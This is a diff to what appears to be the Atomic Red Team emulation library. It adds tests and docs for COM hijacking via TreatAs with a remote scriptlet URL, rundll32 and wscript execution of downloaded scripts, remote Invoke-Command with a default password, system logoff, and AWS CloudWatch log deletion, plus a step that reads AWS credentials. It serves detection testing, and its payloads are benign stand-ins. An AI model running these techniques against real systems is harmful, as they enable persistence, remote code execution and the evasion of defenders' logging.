+          REG_SZ /d \"{00000001-0000-0000-0000-0000FEEDACDC}\" /f\nreg add \"HKEY_CURRENT_USER\\SOFTWARE\\Classes\\CLSID\\{00000001-0000-0000-0000-0000FEEDACDC}\"
+          /f\nreg add \"HKEY_CURRENT_USER\\SOFTWARE\\Classes\\CLSID\\{00000001-0000-0000-0000-0000FEEDACDC}\"
+          /ve /T REG_SZ /d \"AtomicTest\" /f\nreg add \"HKEY_CURRENT_USER\\SOFTWARE\\Classes\\CLSID\\{00000001-0000-0000-0000-0000FEEDACDC}\\InprocServer32\"
+          /ve /T REG_SZ /d \"C:\\\\WINDOWS\\\\system32\\\\scrobj.dll\" /f\nreg add
+          \"HKEY_CURRENT_USER\\SOFTWARE\\Classes\\CLSID\\{00000001-0000-0000-0000-0000FEEDACDC}\\InprocServer32\"
+          /v \"ThreadingModel\" /T REG_SZ /d \"Apartment\" /f\nreg add \"HKEY_CURRENT_USER\\SOFTWARE\\Classes\\CLSID\\{00000001-0000-0000-0000-0000FEEDACDC}\\ProgID\"
+          /ve /T REG_SZ /d \"AtomicTest\" /f\nreg add \"HKEY_CURRENT_USER\\SOFTWARE\\Classes\\CLSID\\{00000001-0000-0000-0000-0000FEEDACDC}\\ScriptletURL\"
+          /ve /T REG_SZ /d \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.015/src/TreatAs.sct\"
+          /f\nreg add \"HKEY_CURRENT_USER\\SOFTWARE\\Classes\\CLSID\\{00000001-0000-0000-0000-0000FEEDACDC}\\VersionIndependentProgID\"
+          /ve /T REG_SZ /d \"AtomicTest\" /f\n\nreg add \"HKEY_CURRENT_USER\\SOFTWARE\\Classes\\CLSID\\{97D47D56-3777-49FB-8E8F-90D7E30E1A1E}\"
+          /f\nreg add \"HKEY_CURRENT_USER\\SOFTWARE\\Classes\\CLSID\\{97D47D56-3777-49FB-8E8F-90D7E30E1A1E}\\TreatAs\"
+          /ve /T REG_SZ /d \"{00000001-0000-0000-0000-0000FEEDACDC}\" /f\n\nrundll32.exe
+          -sta \"AtomicTest\" "
+        cleanup_command: |-
+          reg delete "HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicTest" /f
+          reg delete "HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}" /f
+          reg delete "HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{97D47D56-3777-49FB-8E8F-90D7E30E1A1E}" /f
+        name: powershell
  T1574.009:
    technique:
      x_mitre_platforms:
@@ -58867,6 +59011,44 @@ persistence:
        cleanup_command: Remove-Item -Path 'HKCU:\SOFTWARE\Classes\CLSID\#{clsid}'
          -Recurse -ErrorAction Ignore
        name: powershell
+    - name: COM hijacking via TreatAs
+      auto_generated_guid: 33eacead-f117-4863-8eb0-5c6304fbfaa9
+      description: |-
+        This test first create a custom CLSID class pointing to the Windows Script Component runtime DLL. This DLL looks for the ScriptletURL key to get the location of the script to execute.
+        Then, it hijacks the CLSID for the Work Folders Logon Synchronization to establish persistence on user logon by creating the 'TreatAs' with the malicious CLSID as default value. The
+        test is validated by running 'rundll32.exe -sta "AtomicTest"' to avoid logging out.
+
+        References:
+
+        https://youtu.be/3gz1QmiMhss?t=1251
+
+        https://github.com/enigma0x3/windows-operating-system-archaeology
+      supported_platforms:
+      - windows
+      executor:
+        command: "reg add \"HKEY_CURRENT_USER\\SOFTWARE\\Classes\\AtomicTest\" /ve
+          /T REG_SZ /d \"AtomicTest\" /f\nreg add \"HKEY_CURRENT_USER\\SOFTWARE\\Classes\\AtomicTest.1.00\"
+          /ve /T REG_SZ /d \"AtomicTest\" /f\nreg add \"HKEY_CURRENT_USER\\SOFTWARE\\Classes\\AtomicTest\\CLSID\"
+          /ve /T REG_SZ /d \"{00000001-0000-0000-0000-0000FEEDACDC}\" /f\nreg add
+          \"HKEY_CURRENT_USER\\SOFTWARE\\Classes\\AtomicTest.1.00\\CLSID\" /ve /T
+          REG_SZ /d \"{00000001-0000-0000-0000-0000FEEDACDC}\" /f\nreg add \"HKEY_CURRENT_USER\\SOFTWARE\\Classes\\CLSID\\{00000001-0000-0000-0000-0000FEEDACDC}\"
+          /f\nreg add \"HKEY_CURRENT_USER\\SOFTWARE\\Classes\\CLSID\\{00000001-0000-0000-0000-0000FEEDACDC}\"
+          /ve /T REG_SZ /d \"AtomicTest\" /f\nreg add \"HKEY_CURRENT_USER\\SOFTWARE\\Classes\\CLSID\\{00000001-0000-0000-0000-0000FEEDACDC}\\InprocServer32\"
+          /ve /T REG_SZ /d \"C:\\\\WINDOWS\\\\system32\\\\scrobj.dll\" /f\nreg add
+          \"HKEY_CURRENT_USER\\SOFTWARE\\Classes\\CLSID\\{00000001-0000-0000-0000-0000FEEDACDC}\\InprocServer32\"
+          /v \"ThreadingModel\" /T REG_SZ /d \"Apartment\" /f\nreg add \"HKEY_CURRENT_USER\\SOFTWARE\\Classes\\CLSID\\{00000001-0000-0000-0000-0000FEEDACDC}\\ProgID\"
+          /ve /T REG_SZ /d \"AtomicTest\" /f\nreg add \"HKEY_CURRENT_USER\\SOFTWARE\\Classes\\CLSID\\{00000001-0000-0000-0000-0000FEEDACDC}\\ScriptletURL\"
+          /ve /T REG_SZ /d \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.015/src/TreatAs.sct\"
+          /f\nreg add \"HKEY_CURRENT_USER\\SOFTWARE\\Classes\\CLSID\\{00000001-0000-0000-0000-0000FEEDACDC}\\VersionIndependentProgID\"
+          /ve /T REG_SZ /d \"AtomicTest\" /f\n\nreg add \"HKEY_CURRENT_USER\\SOFTWARE\\Classes\\CLSID\\{97D47D56-3777-49FB-8E8F-90D7E30E1A1E}\"
+          /f\nreg add \"HKEY_CURRENT_USER\\SOFTWARE\\Classes\\CLSID\\{97D47D56-3777-49FB-8E8F-90D7E30E1A1E}\\TreatAs\"
+          /ve /T REG_SZ /d \"{00000001-0000-0000-0000-0000FEEDACDC}\" /f\n\nrundll32.exe
+          -sta \"AtomicTest\" "
+        cleanup_command: |-
+          reg delete "HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicTest" /f
+          reg delete "HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}" /f
+          reg delete "HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{97D47D56-3777-49FB-8E8F-90D7E30E1A1E}" /f
+        name: powershell
  T1137.004:
    technique:
      x_mitre_platforms:
@@ -67495,27 +67677,34 @@ lateral-movement:
          '
        name: powershell
        elevation_required: true
-    - name: Invoke-Command
+    - name: Remote Code Execution with PS Credentials Using Invoke-Command
      auto_generated_guid: 5295bd61-bd7e-4744-9d52-85962a4cf2d6
      description: |
        Execute Invoke-command on remote host.

-        Upon successful execution, powershell will execute ipconfig on localhost using `invoke-command`.
+        Upon successful execution, powershell will execute whoami on specified remote host using `invoke-command`.
      supported_platforms:
      - windows
      input_arguments:
-        host_name:
-          description: Remote Windows Host Name
-          type: String
-          default: localhost
-        remote_command:
-          description: Command to execute on remote Host
-          type: String
-          default: ipconfig
+        username:
+          description: The username running the powershell command
+          type: string
+          default: "$env:USERNAME"
+        remotehost:
+          description: The remote hostname of the machine you are running the powershell
+            command on.
+          type: string
+          default: "$env:COMPUTERNAME"
+        password:
+          description: The password to be used with the user provided in the previous
+            input argument.
+          type: string
+          default: test12345
      executor:
-        command: 'invoke-command -ComputerName #{host_name} -scriptblock {#{remote_command}}
-
-          '
+        command: |-
+          $SecPassword = ConvertTo-SecureString "#{password}" -AsPlainText -Force
+          $Cred = New-Object System.Management.Automation.PSCredential("#{username}", $SecPassword)
+          Invoke-Command -ComputerName "#{remotehost}" -Credential $Cred -ScriptBlock {whoami}
        name: powershell
    - name: WinRM Access with Evil-WinRM
      auto_generated_guid: efe86d95-44c4-4509-ae42-7bfd9d1f5b3d
@@ -91310,6 +91499,21 @@ command-and-control:
        command: 'certreq.exe -Post -config #{remote_file} c:\windows\win.ini #{local_path}'
        cleanup_command: 'del #{local_path} >nul 2>&1'
        name: command_prompt
+    - name: Download a file using wscript
+      auto_generated_guid: 97116a3f-efac-4b26-8336-b9cb18c45188
+      description: Use wscript to run a local VisualBasic file to download a remote
+        file
+      supported_platforms:
+      - windows
+      input_arguments:
+        vbscript_file:
+          description: Full path to the VisualBasic downloading the file
+          type: String
+          default: PathToAtomicsFolder\T1105\src\T1105-download-file.vbs
+      executor:
+        command: 'wscript.exe #{vbscript_file}'
+        cleanup_command: del Atomic-License.txt >nul 2>&1
+        name: command_prompt
  T1001.002:
    technique:
      x_mitre_platforms:
@@ -96530,6 +96734,25 @@ impact:
          '
        name: bash
        elevation_required: true
+    - name: Logoff System - Windows
+      auto_generated_guid: 3d8c25b5-7ff5-4c9d-b21f-85ebd06654a4
+      description: 'This test performs a Windows system logoff as seen in [dcrat backdoor
+        capabilities](https://www.mandiant.com/resources/analyzing-dark-crystal-rat-backdoor)
+
+        '
+      supported_platforms:
+      - windows
+      input_arguments:
+        timeout:
+          description: Timeout period before shutdown (seconds)
+          type: Integer
+          default: 1
+      executor:
+        command: 'shutdown /l /t #{timeout}
+
+          '
+        name: command_prompt
+        elevation_required: true
 initial-access:
  T1133:
    technique:
@@ -8,7 +8,7 @@ WinRM is the name of both a Windows service and a protocol that allows a user to

 - [Atomic Test #1 - Enable Windows Remote Management](#atomic-test-1---enable-windows-remote-management)

- [Atomic Test #2 - Invoke-Command](#atomic-test-2---invoke-command)
+- [Atomic Test #2 - Remote Code Execution with PS Credentials Using Invoke-Command](#atomic-test-2---remote-code-execution-with-ps-credentials-using-invoke-command)

 - [Atomic Test #3 - WinRM Access with Evil-WinRM](#atomic-test-3---winrm-access-with-evil-winrm)

@@ -45,10 +45,10 @@ Enable-PSRemoting -Force
 <br/>
 <br/>

-## Atomic Test #2 - Invoke-Command
+## Atomic Test #2 - Remote Code Execution with PS Credentials Using Invoke-Command
 Execute Invoke-command on remote host.

-Upon successful execution, powershell will execute ipconfig on localhost using `invoke-command`.
+Upon successful execution, powershell will execute whoami on specified remote host using `invoke-command`.

 **Supported Platforms:** Windows

@@ -62,15 +62,18 @@ Upon successful execution, powershell will execute ipconfig on localhost using `
 #### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
-| host_name | Remote Windows Host Name | String | localhost|
-| remote_command | Command to execute on remote Host | String | ipconfig|
+| username | The username running the powershell command | string | $env:USERNAME|
+| remotehost | The remote hostname of the machine you are running the powershell command on. | string | $env:COMPUTERNAME|
+| password | The password to be used with the user provided in the previous input argument. | string | test12345|


 #### Attack Commands: Run with `powershell`! 


 ```powershell
-invoke-command -ComputerName #{host_name} -scriptblock {#{remote_command}}
+$SecPassword = ConvertTo-SecureString "#{password}" -AsPlainText -Force
+$Cred = New-Object System.Management.Automation.PSCredential("#{username}", $SecPassword)
+Invoke-Command -ComputerName "#{remotehost}" -Credential $Cred -ScriptBlock {whoami}
 ```


@@ -14,27 +14,34 @@ atomic_tests:
      Enable-PSRemoting -Force
    name: powershell
    elevation_required: true
- name: Invoke-Command
+- name: Remote Code Execution with PS Credentials Using Invoke-Command
  auto_generated_guid: 5295bd61-bd7e-4744-9d52-85962a4cf2d6
  description: |
    Execute Invoke-command on remote host.

-    Upon successful execution, powershell will execute ipconfig on localhost using `invoke-command`.
+    Upon successful execution, powershell will execute whoami on specified remote host using `invoke-command`.
  supported_platforms:
  - windows
  input_arguments:
-    host_name:
-      description: Remote Windows Host Name
-      type: String
-      default: localhost
-    remote_command:
-      description: Command to execute on remote Host
-      type: String
-      default: ipconfig
+    username:
+      description: The username running the powershell command
+      type: string
+      default: $env:USERNAME
+    remotehost:
+      description: The remote hostname of the machine you are running the powershell command on.
+      type: string
+      default: $env:COMPUTERNAME
+    password:
+      description: The password to be used with the user provided in the previous input argument.
+      type: string
+      default: test12345
  executor:
-    command: |
-      invoke-command -ComputerName #{host_name} -scriptblock {#{remote_command}}
+    command: |-
+      $SecPassword = ConvertTo-SecureString "#{password}" -AsPlainText -Force
+      $Cred = New-Object System.Management.Automation.PSCredential("#{username}", $SecPassword)
+      Invoke-Command -ComputerName "#{remotehost}" -Credential $Cred -ScriptBlock {whoami}
    name: powershell
+    
 - name: WinRM Access with Evil-WinRM
  auto_generated_guid: efe86d95-44c4-4509-ae42-7bfd9d1f5b3d
  description: An adversary may attempt to use Evil-WinRM with a valid account to interact with remote systems that have WinRM enabled
@@ -58,6 +58,8 @@ On Windows, adversaries may use various utilities to download tools, such as `co

 - [Atomic Test #25 - certreq download](#atomic-test-25---certreq-download)

+- [Atomic Test #26 - Download a file using wscript](#atomic-test-26---download-a-file-using-wscript)
+

 <br/>

@@ -1132,4 +1134,41 @@ del #{local_path} >nul 2>&1



+<br/>
+<br/>
+
+## Atomic Test #26 - Download a file using wscript
+Use wscript to run a local VisualBasic file to download a remote file
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 97116a3f-efac-4b26-8336-b9cb18c45188
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| vbscript_file | Full path to the VisualBasic downloading the file | String | PathToAtomicsFolder&#92;T1105&#92;src&#92;T1105-download-file.vbs|
+
+
+#### Attack Commands: Run with `command_prompt`! 
+
+
+```cmd
+wscript.exe #{vbscript_file}
+```
+
+#### Cleanup Commands:
+```cmd
+del Atomic-License.txt >nul 2>&1
+```
+
+
+
+
+
 <br/>
@@ -700,4 +700,18 @@ atomic_tests:
    command: 'certreq.exe -Post -config #{remote_file} c:\windows\win.ini #{local_path}'
    cleanup_command: 'del #{local_path} >nul 2>&1'
    name: command_prompt
-  
+
+- name: Download a file using wscript
+  auto_generated_guid: 97116a3f-efac-4b26-8336-b9cb18c45188
+  description: Use wscript to run a local VisualBasic file to download a remote file
+  supported_platforms:
+  - windows
+  input_arguments:
+    vbscript_file:
+      description: Full path to the VisualBasic downloading the file
+      type: String
+      default: PathToAtomicsFolder\T1105\src\T1105-download-file.vbs
+  executor:
+    command: 'wscript.exe #{vbscript_file}'
+    cleanup_command: del Atomic-License.txt >nul 2>&1
+    name: command_prompt
@@ -0,0 +1,10 @@
+Set objWinHttp = CreateObject("WinHttp.WinHttpRequest.5.1") 
+URL = "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt" 
+objWinHttp.open "GET", URL, False 
+objWinHttp.send ""
+Dim BinaryStream
+Set BinaryStream = CreateObject("ADODB.Stream")
+BinaryStream.Type = 1
+BinaryStream.Open
+BinaryStream.Write objWinHttp.responseBody
+BinaryStream.SaveToFile "Atomic-License.txt", 2
@@ -75,6 +75,16 @@ if (Test-Path #{dll_path}) {exit 0} else {exit 1}
 New-Item -Type Directory (split-path #{dll_path}) -ErrorAction ignore | Out-Null
 Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1134.004/bin/calc.dll" -OutFile "#{dll_path}"
 ```
+##### Description: PPID.ps1 must exist on disk at $PathToAtomicsFolder\T1134.004\src\PPID-Spoof.ps1
+##### Check Prereq Commands:
+```powershell
+if (Test-Path $PathToAtomicsFolder\T1134.004\src\PPID-Spoof.ps1) {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+New-Item -Type Directory (split-path $PathToAtomicsFolder\T1134.004\src\PPID-Spoof.ps1) -ErrorAction ignore | Out-Null
+Invoke-WebRequest "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1134.004/src/PPID-Spoof.ps1" -OutFile $PathToAtomicsFolder\T1134.004\src\PPID-Spoof.ps1
+```



@@ -41,6 +41,13 @@ atomic_tests:
    get_prereq_command: |
      New-Item -Type Directory (split-path #{dll_path}) -ErrorAction ignore | Out-Null
      Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1134.004/bin/calc.dll" -OutFile "#{dll_path}"
+  - description: |
+      PPID.ps1 must exist on disk at $PathToAtomicsFolder\T1134.004\src\PPID-Spoof.ps1
+    prereq_command: |
+      if (Test-Path $PathToAtomicsFolder\T1134.004\src\PPID-Spoof.ps1) {exit 0} else {exit 1}
+    get_prereq_command: |
+      New-Item -Type Directory (split-path $PathToAtomicsFolder\T1134.004\src\PPID-Spoof.ps1) -ErrorAction ignore | Out-Null
+      Invoke-WebRequest "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1134.004/src/PPID-Spoof.ps1" -OutFile $PathToAtomicsFolder\T1134.004\src\PPID-Spoof.ps1
  executor:
    command: |
      . $PathToAtomicsFolder\T1134.004\src\PPID-Spoof.ps1
@@ -45,7 +45,7 @@ Test execution of a remote script using rundll32.exe. Upon execution notepad.exe
 **Supported Platforms:** Windows


-**auto_generated_guid:** cf3bdb9a-dd11-4b6c-b0d0-9e22b68a71be
+**auto_generated_guid:** 57ba4ce9-ee7a-4f27-9928-3c70c489b59d



@@ -61,9 +61,13 @@ Test execution of a remote script using rundll32.exe. Upon execution notepad.exe


 ```cmd
-rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:#{file_url}").Exec();
+start /b rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:#{file_url}").Exec();
 ```

+#### Cleanup Commands:
+```cmd
+taskkill /IM notepad.exe /f
+```



@@ -2,7 +2,7 @@ attack_technique: T1218.011
 display_name: 'Signed Binary Proxy Execution: Rundll32'
 atomic_tests:
 - name: Rundll32 execute JavaScript Remote Payload With GetObject
-  auto_generated_guid: cf3bdb9a-dd11-4b6c-b0d0-9e22b68a71be
+  auto_generated_guid: 57ba4ce9-ee7a-4f27-9928-3c70c489b59d
  description: |
    Test execution of a remote script using rundll32.exe. Upon execution notepad.exe will be opened.
  supported_platforms:
@@ -14,7 +14,9 @@ atomic_tests:
      default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.011/src/T1218.011.sct
  executor:
    command: |
-      rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:#{file_url}").Exec();
+      start /b rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:#{file_url}").Exec();
+    cleanup_command: |
+      taskkill /IM notepad.exe /f
    name: command_prompt
 - name: Rundll32 execute VBscript command
  auto_generated_guid: 638730e7-7aed-43dc-bf8c-8117f805f5bb
@@ -24,6 +24,8 @@ Adversaries may attempt to shutdown/reboot a system after impacting it in other

 - [Atomic Test #9 - Reboot System via `poweroff` - Linux](#atomic-test-9---reboot-system-via-poweroff---linux)

+- [Atomic Test #10 - Logoff System - Windows](#atomic-test-10---logoff-system---windows)
+

 <br/>

@@ -296,4 +298,37 @@ poweroff --reboot



+<br/>
+<br/>
+
+## Atomic Test #10 - Logoff System - Windows
+This test performs a Windows system logoff as seen in [dcrat backdoor capabilities](https://www.mandiant.com/resources/analyzing-dark-crystal-rat-backdoor)
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 3d8c25b5-7ff5-4c9d-b21f-85ebd06654a4
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| timeout | Timeout period before shutdown (seconds) | Integer | 1|
+
+
+#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
+
+
+```cmd
+shutdown /l /t #{timeout}
+```
+
+
+
+
+
+
 <br/>
@@ -123,3 +123,19 @@ atomic_tests:
      poweroff --reboot
    name: bash
    elevation_required: true
+- name: Logoff System - Windows
+  auto_generated_guid: 3d8c25b5-7ff5-4c9d-b21f-85ebd06654a4
+  description: |
+    This test performs a Windows system logoff as seen in [dcrat backdoor capabilities](https://www.mandiant.com/resources/analyzing-dark-crystal-rat-backdoor)
+  supported_platforms:
+  - windows
+  input_arguments:
+    timeout:
+      description: Timeout period before shutdown (seconds)
+      type: Integer
+      default: 1
+  executor:
+    command: |
+      shutdown /l /t #{timeout}
+    name: command_prompt
+    elevation_required: true
@@ -12,6 +12,8 @@ Adversaries can use the COM system to insert malicious code that can be executed

 - [Atomic Test #3 - COM Hijacking with RunDLL32 (Local Server Switch)](#atomic-test-3---com-hijacking-with-rundll32-local-server-switch)

+- [Atomic Test #4 - COM hijacking via TreatAs](#atomic-test-4---com-hijacking-via-treatas)
+

 <br/>

@@ -162,4 +164,61 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato



+<br/>
+<br/>
+
+## Atomic Test #4 - COM hijacking via TreatAs
+This test first create a custom CLSID class pointing to the Windows Script Component runtime DLL. This DLL looks for the ScriptletURL key to get the location of the script to execute.
+Then, it hijacks the CLSID for the Work Folders Logon Synchronization to establish persistence on user logon by creating the 'TreatAs' with the malicious CLSID as default value. The
+test is validated by running 'rundll32.exe -sta "AtomicTest"' to avoid logging out.
+
+References:
+
+https://youtu.be/3gz1QmiMhss?t=1251
+
+https://github.com/enigma0x3/windows-operating-system-archaeology
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 33eacead-f117-4863-8eb0-5c6304fbfaa9
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+reg add "HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicTest" /ve /T REG_SZ /d "AtomicTest" /f
+reg add "HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicTest.1.00" /ve /T REG_SZ /d "AtomicTest" /f
+reg add "HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicTest\CLSID" /ve /T REG_SZ /d "{00000001-0000-0000-0000-0000FEEDACDC}" /f
+reg add "HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicTest.1.00\CLSID" /ve /T REG_SZ /d "{00000001-0000-0000-0000-0000FEEDACDC}" /f
+reg add "HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}" /f
+reg add "HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}" /ve /T REG_SZ /d "AtomicTest" /f
+reg add "HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\InprocServer32" /ve /T REG_SZ /d "C:\\WINDOWS\\system32\\scrobj.dll" /f
+reg add "HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\InprocServer32" /v "ThreadingModel" /T REG_SZ /d "Apartment" /f
+reg add "HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\ProgID" /ve /T REG_SZ /d "AtomicTest" /f
+reg add "HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\ScriptletURL" /ve /T REG_SZ /d "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.015/src/TreatAs.sct" /f
+reg add "HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\VersionIndependentProgID" /ve /T REG_SZ /d "AtomicTest" /f
+
+reg add "HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{97D47D56-3777-49FB-8E8F-90D7E30E1A1E}" /f
+reg add "HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{97D47D56-3777-49FB-8E8F-90D7E30E1A1E}\TreatAs" /ve /T REG_SZ /d "{00000001-0000-0000-0000-0000FEEDACDC}" /f
+
+rundll32.exe -sta "AtomicTest"
+```
+
+#### Cleanup Commands:
+```powershell
+reg delete "HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicTest" /f
+reg delete "HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}" /f
+reg delete "HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{97D47D56-3777-49FB-8E8F-90D7E30E1A1E}" /f
+```
+
+
+
+
+
 <br/>
@@ -95,3 +95,42 @@ atomic_tests:
    cleanup_command: |-
      Remove-Item -Path 'HKCU:\SOFTWARE\Classes\CLSID\#{clsid}' -Recurse -ErrorAction Ignore
    name: powershell
+- name: COM hijacking via TreatAs
+  auto_generated_guid: 33eacead-f117-4863-8eb0-5c6304fbfaa9
+  description: |-
+    This test first create a custom CLSID class pointing to the Windows Script Component runtime DLL. This DLL looks for the ScriptletURL key to get the location of the script to execute.
+    Then, it hijacks the CLSID for the Work Folders Logon Synchronization to establish persistence on user logon by creating the 'TreatAs' with the malicious CLSID as default value. The
+    test is validated by running 'rundll32.exe -sta "AtomicTest"' to avoid logging out.
+
+    References:
+
+    https://youtu.be/3gz1QmiMhss?t=1251
+
+    https://github.com/enigma0x3/windows-operating-system-archaeology
+
+  supported_platforms:
+  - windows
+  executor:
+    command: |-
+      reg add "HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicTest" /ve /T REG_SZ /d "AtomicTest" /f
+      reg add "HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicTest.1.00" /ve /T REG_SZ /d "AtomicTest" /f
+      reg add "HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicTest\CLSID" /ve /T REG_SZ /d "{00000001-0000-0000-0000-0000FEEDACDC}" /f
+      reg add "HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicTest.1.00\CLSID" /ve /T REG_SZ /d "{00000001-0000-0000-0000-0000FEEDACDC}" /f
+      reg add "HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}" /f
+      reg add "HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}" /ve /T REG_SZ /d "AtomicTest" /f
+      reg add "HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\InprocServer32" /ve /T REG_SZ /d "C:\\WINDOWS\\system32\\scrobj.dll" /f
+      reg add "HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\InprocServer32" /v "ThreadingModel" /T REG_SZ /d "Apartment" /f
+      reg add "HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\ProgID" /ve /T REG_SZ /d "AtomicTest" /f
+      reg add "HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\ScriptletURL" /ve /T REG_SZ /d "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.015/src/TreatAs.sct" /f
+      reg add "HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\VersionIndependentProgID" /ve /T REG_SZ /d "AtomicTest" /f
+
+      reg add "HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{97D47D56-3777-49FB-8E8F-90D7E30E1A1E}" /f
+      reg add "HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{97D47D56-3777-49FB-8E8F-90D7E30E1A1E}\TreatAs" /ve /T REG_SZ /d "{00000001-0000-0000-0000-0000FEEDACDC}" /f
+
+      rundll32.exe -sta "AtomicTest" 
+
+    cleanup_command: |-
+      reg delete "HKEY_CURRENT_USER\SOFTWARE\Classes\AtomicTest" /f
+      reg delete "HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}" /f
+      reg delete "HKEY_CURRENT_USER\SOFTWARE\Classes\CLSID\{97D47D56-3777-49FB-8E8F-90D7E30E1A1E}" /f
+    name: powershell
@@ -0,0 +1,22 @@
+<?XML version="1.0"?>
+<scriptlet>
+
+<registration
+    description="AtomicTest"
+    progid="AtomicTest"
+    version="1.00"
+    classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"
+    remotable="true"
+	>
+</registration>
+
+<script language="JScript">
+<![CDATA[
+
+		var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
+	
+	
+]]>
+</script>
+
+</scriptlet>
@@ -14,6 +14,10 @@ Cloud environments allow for collection and analysis of audit and application lo

 - [Atomic Test #4 - Disable CloudTrail Logging Through Event Selectors via Stratus](#atomic-test-4---disable-cloudtrail-logging-through-event-selectors-via-stratus)

+- [Atomic Test #5 - AWS CloudWatch Log Group Deletes](#atomic-test-5---aws-cloudwatch-log-group-deletes)
+
+- [Atomic Test #6 - AWS CloudWatch Log Stream Deletes](#atomic-test-6---aws-cloudwatch-log-stream-deletes)
+

 <br/>

@@ -261,4 +265,109 @@ echo Please install the aws-cli and configure your AWS defult profile using: aws



+<br/>
+<br/>
+
+## Atomic Test #5 - AWS CloudWatch Log Group Deletes
+Creates a new cloudWatch log group in AWS, Upon successful creation it will Delete the group. Attackers can use this technique to evade defenses by 
+deleting the log stream. Once it is deleted, the logs created by the attackers will not be logged. https://www.elastic.co/guide/en/security/current/aws-cloudwatch-log-group-deletion.html#aws-cloudwatch-log-group-deletion
+
+**Supported Platforms:** Iaas:aws
+
+
+**auto_generated_guid:** 89422c87-b57b-4a04-a8ca-802bb9d06121
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| cloudwatch_log_group_name | Name of the cloudWatch log group | String | log-test|
+| region | Name of the region | String | us-east-1|
+
+
+#### Attack Commands: Run with `sh`! 
+
+
+```sh
+aws logs create-log-group --log-group-name #{cloudwatch_log_group_name} --region #{region} --output json
+echo "*** Log Group Created ***"
+aws logs delete-log-group --log-group-name #{cloudwatch_log_group_name} --region #{region} --output json
+echo "*** Log Group Deleted ***"
+```
+
+
+
+
+#### Dependencies:  Run with `sh`!
+##### Description: Check if ~/.aws/credentials file has a default stanza is configured
+##### Check Prereq Commands:
+```sh
+cat ~/.aws/credentials | grep "default"
